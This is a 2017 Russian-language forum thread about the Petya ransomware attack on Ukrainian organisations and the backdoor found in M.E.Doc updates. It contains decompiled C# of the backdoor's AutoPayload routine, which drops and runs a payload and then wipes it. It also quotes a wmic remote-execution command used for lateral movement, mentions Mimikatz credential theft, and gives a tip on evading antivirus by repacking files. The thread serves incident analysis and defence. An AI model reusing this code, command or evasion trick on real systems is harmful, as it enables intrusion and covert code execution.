Хакерская атака, «Киевэнерго», «Ощадбанк», «Нова пошта» и «Укртелеком» Опции

[Суничка]

Petya Ransomware Попередній Аналіз CVE-2017-0199 + MS17-010

«Киевэнерго», «Ощадбанк», «Нова пошта» и «Укртелеком» подверглись хакерской атаке. Волна идет по всей Украине
Энергетические компании Украины подверглись массированной атаке вируса-шифровальщика – аналога WannaCry

Вирус называется очень просто и оригинально – Petya.
Подробнее про WannaCry:

» Нажмите, чтобы показать спойлер - нажмите опять, чтобы скрыть... «

https://ru.wikipedia.org/wiki/WannaCry
Вредоносная программа сканирует в Интернете узлы в поисках компьютеров с открытым TCP-портом 445, который отвечает за обслуживание протокола SMBv1. Обнаружив такой компьютер, программа предпринимает несколько попыток проэксплуатировать на нём уязвимость EternalBlue и, в случае успеха, устанавливает бэкдор DoublePulsar[9], через который загружается и запускается исполняемый код программы WannaCry. При каждой попытке эксплуатации вредоносная программа проверяет наличие на целевом компьютере DoublePulsar, и в случае обнаружения загружается непосредственно через этот бэкдор.

Проверить, подвержены ли вы атаке: https://2ip.ru/check-port/?port=445
Порт должен быть закрыт.
Для прекращения распространения вируса нужно немедленно закрыть TCP-порты 1024–1035, 135 и 445.

Список павших:
Медиа: ATR, 24 канал, , УМХ (football.ua), Корреспондент, Радио "Люкс", Подробности, Тонис, edipresse.
Связь: Vodafone, Киевстар, Астелит (lifecell) – к-к-комбо; Датагруп (Воля), Укртелеком.
Коммерция: Эпицентр, Новая линия, Новус, Фоззи, Synevo, Укрпочта, Мист-Экспресс, Киевводоканал, Цитрус, Film.ua, СтарМедиа, ДТЭК (Метинвест).
Транспорт: а/п «Борисполь», WOG, KLO, Укрзалізниця, Антонов.
Государство: Кабинет Министров Украины, Министерство инфраструктуры Украины, Чернобыльская АЭС.
Нацбанк тоже зацепило. Список, судя по всему, будет пополняться.
Имхо, убытки будут на десятки миллионов.

Тем временем подзалетели не только мы:
Український вірус поширюється по світу - The Independent
На даний момент відомо про ураження систем судноплавної компанії Maersk і британської рекламної компанії WPP.

Возможное лечение:

» Нажмите, чтобы показать спойлер - нажмите опять, чтобы скрыть... «

На компе запустился с загрузочной флешки и почистил Temp'ы, запустил DrWeb, определил как MbrLocker. Удалил угрозу и компьютер запустился. Возможно, это то же самое что проделать исправление загрузочной записи с командной строки. Файлы целые.

Сообщение отредактировал DemirelUA - Jun 28 2017, 12:26

[Koka-ftp]

«Доктор Веб»: M.E.Doc содержит бэкдор, дающий злоумышленникам доступ к компьютеру Хабра..

Запрошенный с зараженной машины файл ZvitPublishedObjects.dll имел тот же хэш, что и исследованный в вирусной лаборатории «Доктор Веб» образец. Таким образом, наши аналитики пришли к выводу, что модуль обновления программы M.E.Doc, реализованный в виде динамической библиотеки ZvitPublishedObjects.dll, содержит бэкдор. Дальнейшее исследование показало, что этот бэкдор может выполнять в инфицированной системе следующие функции:

сбор данных для доступа к почтовым серверам;
выполнение произвольных команд в инфицированной системе;
загрузка на зараженный компьютер произвольных файлов;
загрузка, сохранение и запуск любых исполняемых файлов;
выгрузка произвольных файлов на удаленный сервер.

угу..потому я и запрашивал таймштамп компиляции в "админской" ветке.......у меня в "сетях" было два медка...сетевой и локальный..
Локальный обновился 23го числа (всё гуд), сетевой 26го числа (тоже всё тьху..тьху)....
зы как показал анализ оба файла идентичны и создались 21го

» Нажмите, чтобы показать спойлер - нажмите опять, чтобы скрыть... «

из этого вывод...либо пронесло.., либо файло не "активировалось"

[Console]

угу..потому я и запрашивал таймштамп компиляции в "админской" ветке.......у меня в "сетях" было два медка...сетевой и локальный..
Локальный обновился 23го числа (всё гуд), сетевой 26го числа (тоже всё тьху..тьху)....
зы как показал анализ оба файла идентичны и создались 21го

» Нажмите, чтобы показать спойлер - нажмите опять, чтобы скрыть... «

из этого вывод...либо пронесло.., либо файло не "активировалось"

Как поведал мне програмист( направление криптография), использовать систему обновления ПО, не подписуя пакеты обновление по HTTP...это просто уровень школьника...

[Koka-ftp]

Как поведал мне програмист( направление криптография), использовать систему обновления ПО, не подписуя пакеты обновление по HTTP...это просто уровень школьника...

Когда я думал, что уже достиг самого дна, снизу постучали

[mak_v_]

https://www.unian.ua/science/2010666-polits...kiberataki.html

Нацполіція вилучила сервери компанії M.E.Doc в рамках розслідування кібератаки вірусу Petya.A минулого тижня. Про це повідомляє Reuters з посиланням на начальника Департаменту кіберполіції Національної поліції України Сергія Демедюка.

Детальніше читайте на УНІАН: https://www.unian.ua/science/2010666-polits...kiberataki.html

[roleg]

Сотрудникам тех службы медка выдали методички: "Все атаки с сервера обновлений Медка отрицать, удивляться..."

[Koka-ftp]

Сотрудникам тех службы медка выдали методички: "Все атаки с сервера обновлений Медка отрицать, удивляться..."

а я знаю, что выдали сотрудникам ощада

[Console]

а я знаю, что выдали сотрудникам ощада

Поведай?)

[Koka-ftp]

Поведай?)

тяжко им в общем....нагнуло уж больно много воркстейшинов...
не совсем понятно как... у них петя пролез даже через фикс MS17-010
ps сейчас смотрел в сторону PsExec..возможно этот пакет тоже был замешан)

Сообщение отредактировал Koka-ftp - Jul 4 2017, 21:50

[roleg]

тяжко им в общем....нагнуло уж больно много воркстейшинов...
не совсем понятно как... у них петя пролез даже через фикс MS17-010
ps сейчас смотрел в сторону PsExec..возможно этот пакет тоже был замешан)

как у меня, мимикатз достал токены администратора домена
тоже пробило дофига через psexec

[Console]

тяжко им в общем....нагнуло уж больно много воркстейшинов...
не совсем понятно как... у них петя пролез даже через фикс MS17-010
ps сейчас смотрел в сторону PsExec..возможно этот пакет тоже был замешан)

Так он собствено и притянул свою копию PsExec или вы не в курсах?)
Клик

Для последующего распространения внутри сети использует:
Уязвимость MS17-10, также, как и WannaCry;
Удаленный доступ к консоли WMI (Windows Management Instrumentation), команды вида
wmic.exe /node:"<hostname>" /user:"<username>" /password:"<password> process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1
Утилиту PSEXEC от Microsoft (имена и пароли учетных записей собираются на зараженной машине с помощью утилиты, аналогичной по функциональности утилите «Mimikatz»; пароли в открытом виде получаются путем чтения памяти процесса lsass.exe.

как у меня, мимикатз достал токены администратора домена
тоже пробило дофига через psexec

Токены, ключи? Нужно на апартных носителях юзать

Сообщение отредактировал Console - Jul 4 2017, 22:02

[roleg]

Токены, ключи? Нужно на апартных носителях юзать

мимикатз тянет приватные ключи пользователей из памяти
мелкософты не фиксят, все системы уязвимы

Сообщение отредактировал roleg - Jul 4 2017, 22:02

[volucer]

мимикатз тянет приватные ключи пользователей из памяти
мелкософты не фиксят, все системы уязвимы

Ядро нужно переписывать вот и не хотят / не могут
Кстати, может кто в курсе, там достаточно только разовое использование админ прав или активная сессия нужна?

Кому интересно список файлов, которые могут быть заражены (почта):
http://softwarius.ru/50-potentsialno-opasn...eniy-v-windows/
Как правило, если какой-то из этих форматов запакован в архив (иначе почтовые серверы не пропустят), и неизвестно от кого, то 99% зловред
Как вариант ставится запрет на выполнение (открытие) в политиках, в первую очередь в папке %temp% (сюда распаковывает архиватор при открытии архива)

Это я все к чему

Антивирусы добавляют в базы сигнатур сигнатуры исполняемого для расшифровки кода криптора. Это приводит к тому что, зашифрованные, например для уменьшения размера, распространённым криптором программы определяются как заражённые...Как правило, достаточно всего лишь перепаковать файл и антивирусная защита пропустит его.

https://ru.wikipedia.org/wiki/Криптор

Сообщение отредактировал volucer - Jul 4 2017, 23:04

[OstJoker]

Почему в голосовалке нету варианта: "Админ чайник, не ставит обновление системы, не настраивает фаервол и не отключает ненужные службы на клиентских ПК".

[PhoeniX07]

Очень много шума вокруг медка.
Намеренно хотят слить медок, и протолкнуть новое ПО.

[mak_v_]

Очень много шума вокруг медка.
Намеренно хотят слить медок, и протолкнуть новое ПО.

Опять клевещут разработчиков, которыми владеет успешный управленец?

[dimicon]

Это расследование конечно очень интересно. Меня интересует другой вопрос, можно ли уже Укрпочтой отправлять посылки? Вчера в отделение заходил, а барышня за окошком: "на нас хакерская атака, посылки не принимаем". Через сколько заработает Укрпочта?

[tedder]

Киберполиция Украины рапортует о пресечении второй попытки атаки Петей: http://24tv.ua/kiberpolitsiya_zupinila_dru...i_ataki_n837734

[Koka-ftp]

угу..потому я и запрашивал таймштамп компиляции в "админской" ветке.......у меня в "сетях" было два медка...сетевой и локальный..
Локальный обновился 23го числа (всё гуд), сетевой 26го числа (тоже всё тьху..тьху)....
зы как показал анализ оба файла идентичны и создались 21го

» Нажмите, чтобы показать спойлер - нажмите опять, чтобы скрыть... «

из этого вывод...либо пронесло.., либо файло не "активировалось"

вчера таки разобрал длл-ку...
дыра есть

» Нажмите, чтобы показать спойлер - нажмите опять, чтобы скрыть... «

// ZvitPublishedObjects.Server.Worker
public string AutoPayload(string name, byte[] data, string arguments)
{
    int num = 0;
    string text = string.Empty;
    string b = "FAIL DUMP";
    string text2 = string.Empty;
    try
    {
        string environmentVariable = Environment.GetEnvironmentVariable("windir");
        string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData);
        if (!string.IsNullOrEmpty(environmentVariable))
        {
            text2 = Path.Combine(environmentVariable, name);
            b = this.DumpData(text2, data);
        }
        if (!File.Exists(text2) && !string.IsNullOrEmpty(folderPath))
        {
            text2 = Path.Combine(folderPath, name);
            b = this.DumpData(text2, data);
        }
        if ("OK" == b)
        {
            string fileName = Path.Combine(environmentVariable, "system32\\rundll32.exe");
            using (Process process = new Process
            {
                StartInfo = new ProcessStartInfo
                {
                    FileName = fileName,
                    UseShellExecute = false,
                    RedirectStandardOutput = true,
                    CreateNoWindow = true,
                    Arguments = string.Format("\"{0}\",#1 {1}", text2, arguments)
                }
            })
            {
                process.Start();
                if (num > 0)
                {
                    process.WaitForExit(num);
                    if (!process.HasExited)
                    {
                        process.Kill();
                    }
                    text = process.ExitCode.ToString();
                }
                else
                {
                    text = "Started Infinite: " + text2;
                }
            }
        }
    }
    catch (Exception ex)
    {
        text = ex.ToString();
    }
    finally
    {
        try
        {
            Thread.Sleep(500);
            if (File.Exists(text2))
            {
                byte[] array = File.ReadAllBytes(text2);
                Random random = new Random();
                for (int i = 0; i < 13; i++)
                {
                    random.NextBytes(array);
                    File.WriteAllBytes(text2, array);
                }
                Thread.Sleep(500);
                File.Delete(text2);
            }
        }
        catch (Exception ex2)
        {
            text = ex2.ToString();
        }
    }
    return text;
}

[imenno]

Да, это дно не подписанные обновления...

[Koka-ftp]

вчера таки разобрал длл-ку...
дыра есть

» Нажмите, чтобы показать спойлер - нажмите опять, чтобы скрыть... «

// ZvitPublishedObjects.Server.Worker
public string AutoPayload(string name, byte[] data, string arguments)
{
    int num = 0;
    string text = string.Empty;
    string b = "FAIL DUMP";
    string text2 = string.Empty;
    try
    {
        string environmentVariable = Environment.GetEnvironmentVariable("windir");
        string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData);
        if (!string.IsNullOrEmpty(environmentVariable))
        {
            text2 = Path.Combine(environmentVariable, name);
            b = this.DumpData(text2, data);
        }
        if (!File.Exists(text2) && !string.IsNullOrEmpty(folderPath))
        {
            text2 = Path.Combine(folderPath, name);
            b = this.DumpData(text2, data);
        }
        if ("OK" == b)
        {
            string fileName = Path.Combine(environmentVariable, "system32\\rundll32.exe");
            using (Process process = new Process
            {
                StartInfo = new ProcessStartInfo
                {
                    FileName = fileName,
                    UseShellExecute = false,
                    RedirectStandardOutput = true,
                    CreateNoWindow = true,
                    Arguments = string.Format("\"{0}\",#1 {1}", text2, arguments)
                }
            })
            {
                process.Start();
                if (num > 0)
                {
                    process.WaitForExit(num);
                    if (!process.HasExited)
                    {
                        process.Kill();
                    }
                    text = process.ExitCode.ToString();
                }
                else
                {
                    text = "Started Infinite: " + text2;
                }
            }
        }
    }
    catch (Exception ex)
    {
        text = ex.ToString();
    }
    finally
    {
        try
        {
            Thread.Sleep(500);
            if (File.Exists(text2))
            {
                byte[] array = File.ReadAllBytes(text2);
                Random random = new Random();
                for (int i = 0; i < 13; i++)
                {
                    random.NextBytes(array);
                    File.WriteAllBytes(text2, array);
                }
                Thread.Sleep(500);
                File.Delete(text2);
            }
        }
        catch (Exception ex2)
        {
            text = ex2.ToString();
        }
    }
    return text;
}

update
каспер начал ловить как Backdoor.MSIL.Teledoor.gen
Microsoft Forefront молчит (апдейты вчерашние)